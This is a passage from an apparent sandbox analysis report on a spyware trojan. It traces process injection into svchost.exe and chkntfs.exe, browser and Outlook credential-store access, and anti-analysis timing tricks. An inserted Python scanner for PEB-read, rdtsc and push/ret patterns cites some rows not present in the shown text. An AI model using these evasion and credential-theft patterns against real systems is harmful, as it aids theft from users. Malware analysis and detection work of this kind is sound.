                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0452D5B06_2_0452D5B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044D56306_2_044D5630
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045416CC6_2_045416CC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454F7B06_2_0454F7B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044970C06_2_044970C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0453F0CC6_2_0453F0CC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454F0E06_2_0454F0E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045470E96_2_045470E9
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C516C6_2_044C516C
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0447F1726_2_0447F172
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0455B16B6_2_0455B16B
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0449B1B06_2_0449B1B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044AB2C06_2_044AB2C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045312ED6_2_045312ED
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044952A06_2_044952A0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0447D34C6_2_0447D34C
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454132D6_2_0454132D
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044D739A6_2_044D739A
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04509C326_2_04509C32
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454FCF26_2_0454FCF2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04493D406_2_04493D40
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04541D5A6_2_04541D5A
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04547D736_2_04547D73
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044AFDC06_2_044AFDC0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04499EB06_2_04499EB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454FF096_2_0454FF09
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04453FD56_2_04453FD5
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04453FD26_2_04453FD2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04491F926_2_04491F92
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454FFB16_2_0454FFB1
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044FD8006_2_044FD800
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044938E06_2_044938E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044999506_2_04499950
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044AB9506_2_044AB950
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045259106_2_04525910
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04547A466_2_04547A46
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454FA496_2_0454FA49
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04503A6C6_2_04503A6C
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0453DAC66_2_0453DAC6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044D5AA06_2_044D5AA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04531AA36_2_04531AA3
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0452DAAC6_2_0452DAAC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454FB766_2_0454FB76
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04505BF06_2_04505BF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044CDBF96_2_044CDBF9
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044AFB806_2_044AFB80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_024926A06_2_024926A0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_024AC4606_2_024AC460
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248B6E06_2_0248B6E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248D7006_2_0248D700
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248D4D86_2_0248D4D8
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248D4E06_2_0248D4E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248B8256_2_0248B825
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248B8306_2_0248B830
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_02493F6B6_2_02493F6B
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_02493F706_2_02493F70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_02495D706_2_02495D70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_042AE4B36_2_042AE4B3
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_042AE3986_2_042AE398
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_042AE8506_2_042AE850
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_042AD9186_2_042AD918
                Source: C:\Users\user\Desktop\1162-201.exe Code function: String function: 00C40A30 appears 39 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03275130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0322B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 032AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03287E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 032BF290 appears 105 times
                Source: C:\Windows\SysWOW64\chkntfs.exe Code function: String function: 044D7E54 appears 111 times
                Source: C:\Windows\SysWOW64\chkntfs.exe Code function: String function: 0447B970 appears 280 times
                Source: C:\Windows\SysWOW64\chkntfs.exe Code function: String function: 044C5130 appears 58 times
                Source: C:\Windows\SysWOW64\chkntfs.exe Code function: String function: 0450F290 appears 105 times
                Source: C:\Windows\SysWOW64\chkntfs.exe Code function: String function: 044FEA12 appears 86 times
                Source: 1162-201.exe, 00000000.00000003.2157187443.00000000039E3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 1162-201.exe
                Source: 1162-201.exe, 00000000.00000003.2157376467.0000000003B8D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 1162-201.exe
                Source: 1162-201.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/12
                Source: C:\Users\user\Desktop\1162-201.exe Code function: 0_2_00C937B5 GetLastError,FormatMessageW, 0_2_00C937B5
                Source: C:\Users\user\Desktop\1162-201.exe Code function: 0_2_00C810BF AdjustTokenPrivileges,CloseHandle, 0_2_00C810BF
                Source: C:\Users\user\Desktop\1162-201.exe Code function: 0_2_00C816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00C816C3
                Source: C:\Users\user\Desktop\1162-201.exe Code function: 0_2_00C951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00C951CD
                Source: C:\Users\user\Desktop\1162-201.exe Code function: 0_2_00C8D4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00C8D4DC
                Source: C:\Users\user\Desktop\1162-201.exe Code function: 0_2_00C8719E CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode, 0_2_00C8719E
                Source: C:\Users\user\Desktop\1162-201.exe Code function: 0_2_00C242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00C242A2
                Source: C:\Users\user\Desktop\1162-201.exe File created: C:\Users\user\AppData\Local\Temp\reindulging
                Source: 1162-201.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\1162-201.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: chkntfs.exe, 00000006.00000003.2759955837.00000000026F4000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.0000000002724000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.00000000026F4000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2759832671.00000000026D4000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.00000000026FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 1162-201.exe Virustotal: Detection: 35%
                Source: 1162-201.exe ReversingLabs: Detection: 57%
                Source: unknown Process created: C:\Users\user\Desktop\1162-201.exe "C:\Users\user\Desktop\1162-201.exe"
                Source: C:\Users\user\Desktop\1162-201.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1162-201.exe"
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
                Source: C:\Windows\SysWOW64\chkntfs.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\1162-201.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: ulib.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: ifsutil.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: devobj.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\chkntfs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\chkntfs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: 1162-201.exe Static file information: File size 1618432 > 1048576
                Source: 1162-201.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 1162-201.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 1162-201.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 1162-201.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 1162-201.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 1162-201.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 1162-201.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000002.00000002.2579030580.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547680523.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000003.2702996343.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4618836793.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OtAlYRopPg.exe, 00000005.00000000.2502672174.000000000010E000.00000002.00000001.01000000.00000005.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645298930.000000000010E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 1162-201.exe, 00000000.00000003.2158408076.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, 1162-201.exe, 00000000.00000003.2158241457.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2488633914.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2486363849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2581479681.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2578935147.00000000040F1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1162-201.exe, 00000000.00000003.2158408076.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, 1162-201.exe, 00000000.00000003.2158241457.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2579237033.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2488633914.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2486363849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2581479681.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2578935147.00000000040F1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: chkntfs.pdb source: svchost.exe, 00000002.00000002.2579030580.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547680523.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000003.2702996343.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4618836793.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: chkntfs.exe, 00000006.00000002.4625579447.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.0000000002678000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645872739.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2883330637.00000000124DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000006.00000002.4625579447.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.0000000002678000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645872739.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2883330637.00000000124DC000.00000004.80000000.00040000.00000000.sdmp
                Source: 1162-201.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 1162-201.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 1162-201.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 1162-201.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 1162-201.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\1162-201.exe Code function: 0_2_00C242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00C242DE
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248F0B5 push ebp; iretd 6_2_0248F0DE
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_02485127 push D2B59A72h; retf 6_2_02485136
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C3F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C3F98E
                Source: C:\Users\user\Desktop\1162-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
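The push/ret rows above, and the rdtsc and mov eax, dword ptr fs:[00000030h] rows in the evasion and anti-debugging findings that follow, are instruction-level patterns that can be matched directly in raw code bytes. The scanner below is an added example, not Joe Sandbox code and not code from the analysed sample; CODE is a constructed 32-bit x86 buffer, not bytes taken from 1162-201.exe. It is stricter than the sandbox in one respect: it only reports a push that is immediately followed by a ret-family instruction, whereas the report's rows evidently tolerate instructions in between (the row at 2_2_0040837A spans 15 bytes, but push imm32; retf is 6). Two caveats a reader should keep in mind when weighing these rows: push reg; ret is also a legitimate indirect-jump idiom that compilers and runtime libraries emit (the report has one such pair in the original 1162-201.exe itself), and a linear sweep over non-code bytes produces junk pairs such as push ds; iretd, so a handful of hits is a weak signal on its own.

```python
"""Byte-pattern scanner for three instruction-level findings in this report: PEB reads
through the FS segment (mov r32, fs:[30h]), rdtsc timing reads, and push-then-ret control
transfers.  Added example; not Joe Sandbox code and not the sample's code."""
import struct

PEB_OFFSET = 0x30          # TEB+0x30 holds the PEB pointer on 32-bit Windows
RDTSC = b"\x0f\x31"
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Encodings matched (32-bit mode):
#   64 A1 <disp32>      mov eax, fs:[disp32]   (moffs form, what compilers emit for eax)
#   64 8B /r <disp32>   mov r32, fs:[disp32]   ModRM = 0x05 | (reg << 3)
#   0F 31               rdtsc
#   68 imm32 / 6A imm8 / 50+r / 60 / 0E / 1E   push imm32 / push imm8 / push r32 / pushad / push cs / push ds
#   C3 / C2 imm16 / CB / CF                     ret / ret n / retf / iretd
PUSH_LEN = {0x68: 5, 0x6A: 2, 0x60: 1, 0x0E: 1, 0x1E: 1}
PUSH_LEN.update({0x50 + r: 1 for r in range(8)})
RET_NAMES = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCF: "iretd"}


def push_mnemonic(code, i):
    """Render the push at code[i] the way the report prints it (imm32 as hex with an 'h')."""
    op = code[i]
    if op == 0x68:
        return "push %08Xh" % struct.unpack_from("<I", code, i + 1)[0]
    if op == 0x6A:
        return "push %02Xh" % code[i + 1]
    return {0x60: "pushad", 0x0E: "push cs", 0x1E: "push ds"}.get(op, "push " + REG32[(op - 0x50) & 7])


def scan(code: bytes, base: int = 0):
    """Linear sweep over code; returns [(address, mnemonic)] for every match, in address order."""
    hits, i, n = [], 0, len(code)
    while i < n:
        op = code[i]
        if (op == 0x64 and i + 6 <= n and code[i + 1] == 0xA1
                and struct.unpack_from("<I", code, i + 2)[0] == PEB_OFFSET):
            hits.append((base + i, "mov eax, dword ptr fs:[00000030h]"))
            i += 6
            continue
        if (op == 0x64 and i + 7 <= n and code[i + 1] == 0x8B and (code[i + 2] & 0xC7) == 0x05
                and struct.unpack_from("<I", code, i + 3)[0] == PEB_OFFSET):
            reg = REG32[(code[i + 2] >> 3) & 7]
            hits.append((base + i, f"mov {reg}, dword ptr fs:[00000030h]"))
            i += 7
            continue
        if code[i:i + 2] == RDTSC:
            hits.append((base + i, "rdtsc"))
            i += 2
            continue
        # push X immediately followed by ret/retf/iretd (adjacent only; see lead-in)
        if op in PUSH_LEN and i + PUSH_LEN[op] < n and code[i + PUSH_LEN[op]] in RET_NAMES:
            hits.append((base + i, f"{push_mnemonic(code, i)}; {RET_NAMES[code[i + PUSH_LEN[op]]]}"))
            i += PUSH_LEN[op] + 1
            continue
        i += 1
    return hits


def tally(hits):
    """Count hits per finding class, mirroring the three report signatures."""
    counts = {"peb": 0, "rdtsc": 0, "push_ret": 0}
    for _, mn in hits:
        counts["peb" if mn.startswith("mov") else "rdtsc" if mn == "rdtsc" else "push_ret"] += 1
    return counts


# Constructed input: a debugger check, a timing read and three push/ret pairs.
CODE = bytes.fromhex(
    "64A130000000"    # mov eax, dword ptr fs:[30h]     ; PEB
    "8A4002"          # mov al, byte ptr [eax+2]        ; PEB.BeingDebugged, what IsDebuggerPresent reads
    "648B0D30000000"  # mov ecx, dword ptr fs:[30h]
    "0F31"            # rdtsc
    "68729AB5D2CB"    # push D2B59A72h; retf            ; same pair as the row at 2_2_0040837A
    "51C3"            # push ecx; ret
    "60CF"            # pushad; iretd
    "90C3"            # nop; ret                        ; no push in front, not reported
)

if __name__ == "__main__":
    for addr, mnemonic in scan(CODE, base=0x00400000):
        print(f"{addr:08X} {mnemonic}")
    print(tally(scan(CODE)))
```

Run against a dumped code section (for example the svchost.exe region at 0x00400000 or the chkntfs.exe region at 0x0248xxxx that the rows above come from) with base set to the section's load address, and compare the addresses with the report's rows; the PEB and rdtsc matches are exact encodings, while the push/ret matches need the caveats above before they count as evidence.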

                Malware Analysis System Evasion

                [C:\Users\user\Desktop\1162-201.exe] API/Special instruction interceptor: Address: 314CDE4
                [C:\Windows\SysWOW64\chkntfs.exe] API/Special instruction interceptor: Address: 7FFDB442D324
                [C:\Windows\SysWOW64\chkntfs.exe] API/Special instruction interceptor: Address: 7FFDB442D7E4
                [C:\Windows\SysWOW64\chkntfs.exe] API/Special instruction interceptor: Address: 7FFDB442D944
                [C:\Windows\SysWOW64\chkntfs.exe] API/Special instruction interceptor: Address: 7FFDB442D504
                [C:\Windows\SysWOW64\chkntfs.exe] API/Special instruction interceptor: Address: 7FFDB442D544
                [C:\Windows\SysWOW64\chkntfs.exe] API/Special instruction interceptor: Address: 7FFDB442D1E4
                [C:\Windows\SysWOW64\chkntfs.exe] API/Special instruction interceptor: Address: 7FFDB4430154
                [C:\Windows\SysWOW64\chkntfs.exe] API/Special instruction interceptor: Address: 7FFDB442DA44
                [C:\Windows\SysWOW64\svchost.exe] Code function: 2_2_0327096E rdtsc
                [C:\Windows\SysWOW64\chkntfs.exe] Window / User API: threadDelayed 1209
                [C:\Windows\SysWOW64\chkntfs.exe] Window / User API: threadDelayed 8764
                [C:\Users\user\Desktop\1162-201.exe] API coverage: 4.8 %
                [C:\Windows\SysWOW64\svchost.exe] API coverage: 0.7 %
                [C:\Windows\SysWOW64\chkntfs.exe] API coverage: 2.6 %
                [C:\Windows\SysWOW64\chkntfs.exe TID: 6508] Thread sleep count: 1209 > 30
                [C:\Windows\SysWOW64\chkntfs.exe TID: 6508] Thread sleep time: -2418000s >= -30000s
                [C:\Windows\SysWOW64\chkntfs.exe TID: 6508] Thread sleep count: 8764 > 30
                [C:\Windows\SysWOW64\chkntfs.exe TID: 6508] Thread sleep time: -17528000s >= -30000s
                [C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192] Thread sleep time: -80000s >= -30000s
